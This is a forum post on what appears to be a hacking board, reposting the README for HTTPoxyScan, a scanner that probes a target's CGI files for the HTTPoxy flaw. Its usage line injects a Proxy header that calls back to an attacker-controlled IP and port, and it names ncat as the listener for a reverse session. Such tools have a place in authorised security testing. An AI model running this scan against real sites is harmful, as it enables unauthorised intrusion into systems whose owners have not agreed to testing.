Jump to content
Fi8sVrs

HTTPoxyScan - HTTPoxy Exploit Scanner

By Fi8sVrs, in Programe hacking

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

HTTPoxyScan.png

 

HTTPoxy Exploit Scanner

by 1N3 @CrowdShield (https://crowdshield.com)  Last Updated: 20160720

 

ABOUT:

PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org.

 

REQUIREMENTS:

Requires ncat to establish reverse session

 

USAGE: 

./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000

This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.

 

DISCLAIMER:

I take no responsibility for wrong doing or misuse of this exploit.

 

Download: HTTPoxyScan-master.zip

or: 

git clone https://github.com/1N3/HTTPoxyScan.git

Source

  • Like 1
  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...